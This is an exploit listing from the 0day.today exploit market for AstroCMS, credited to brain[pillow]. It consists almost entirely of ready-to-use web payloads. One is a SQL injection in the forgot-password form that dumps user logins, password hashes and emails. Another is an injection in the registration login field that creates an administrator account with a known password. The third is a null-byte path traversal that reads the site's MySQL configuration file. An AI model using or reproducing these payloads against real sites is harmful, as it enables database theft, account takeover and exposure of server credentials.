[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AstroCMS Multiple Vulnerabilities

Author
brain[pillow]
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16928
Category
web applications
Date add
11-09-2011
Platform
php
# Exploit Title: AstroCMS Multiple Remote Vulnerabilities
# Google Dork: none
# Date: 12.03.2011
# Author: brain[pillow]
# Software Link: http://www.astrocms.com/
# Version: UNKNOWN
 
============================================================
FORGOT_PASSWORD SQL-INJ EXPLOIT:
============================================================
 
 /registration/forgot/
 
 a' union select 0,0,0,0,concat_ws(0x3a,login,password,email,status ,level),0,0,0,0,0,0,0 from auth_users where id=5#
 
id=6 - usually admin
 
============================================================
REGISTER_USER EXPLOIT:
============================================================
 /registration/
 
adrnin','4297f44b13955235245b2497399d7a93','adrnin ','okk@mail.com',1,5,'','','')#
 
Submitting this to "login field" will add "adrnin" user with admin rights and password "123123".
Usually 5 - is admin group.
 
============================================================
READ FILE EXPLOIT:
============================================================
 
 /include/get_js.php4?fname=../htdocs/include/config_mysql.inc%00.js
 
OR:
 
 /include/get_js.php?fname=../htdocs/include/config_mysql.inc%00.js



#  0day.today [2024-11-15]  #